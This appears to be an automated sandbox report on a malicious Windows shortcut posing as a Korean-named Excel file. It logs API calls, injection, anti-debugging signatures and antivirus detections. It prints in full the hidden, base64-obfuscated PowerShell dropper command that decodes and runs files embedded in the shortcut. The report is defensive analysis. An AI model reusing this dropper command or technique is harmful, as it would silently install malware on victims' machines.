heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\김명희_20240515.xlsx.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ep bypass -command $ol = 0x00000f2e; $tl = 0x0000270b; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30=';$bytes = [Convert]::FromBase64String($a);$res = -join ($bytes -as [char[]]);&('{0}{3}{1}{4}{2}'-f 'Inv','ke-','n','o','Expressio') $res
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2668
thread_handle: 0x00000334
process_identifier: 2664
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ep bypass -command $ol = 0x00000f2e; $tl = 0x0000270b; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30=';$bytes = [Convert]::FromBase64String($a);$res = -join ($bytes -as [char[]]);&('{0}{3}{1}{4}{2}'-f 'Inv','ke-','n','o','Expressio') $res
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Process injection Process 2548 resumed a thread in remote process 2664
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2664
1 0 0
option -ep bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noninteractive value Prevents creating an interactive prompt for the user
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.WinLNK.Boxter.4!c
Skyhigh BehavesLike.Trojan.zg
ALYac Trojan.Agent.LNK.Gen
VIPRE Heur.BZC.YAX.Boxter.957.33A348F4
Arcabit Heur.BZC.YAX.Boxter.957.33A348F4
Symantec Scr.Mallnk!gen1
ESET-NOD32 LNK/Agent.ADS
TrendMicro-HouseCall TROJ_FRS.VSNTEH24
McAfee Artemis!0993CF18121B
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.Multi.Powecod.a
BitDefender Heur.BZC.YAX.Boxter.957.33A348F4
MicroWorld-eScan Heur.BZC.YAX.Boxter.957.33A348F4
Rising Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Emsisoft Heur.BZC.YAX.Boxter.957.33A348F4 (B)
TrendMicro TROJ_FRS.VSNTEH24
FireEye Heur.BZC.YAX.Boxter.957.33A348F4
Sophos Troj/LnkDrop-M
Ikarus Trojan.SuspectCRC
Google Detected
Kingsoft Script.Troj.CMDLnk.22143
ViRobot LNK.S.Dropper.9995
ZoneAlarm HEUR:Trojan.Multi.Powecod.a
GData Heur.BZC.YAX.Boxter.957.33A348F4
Varist LNK/ABRisk.GAOO-4
AhnLab-V3 Dropper/LNK.Generic
VBA32 Trojan.Link.ShellCmd
Tencent Win32.Trojan.Powecod.Dtgl
MAX malware (ai score=87)
AVG Other:Malware-gen [Trj]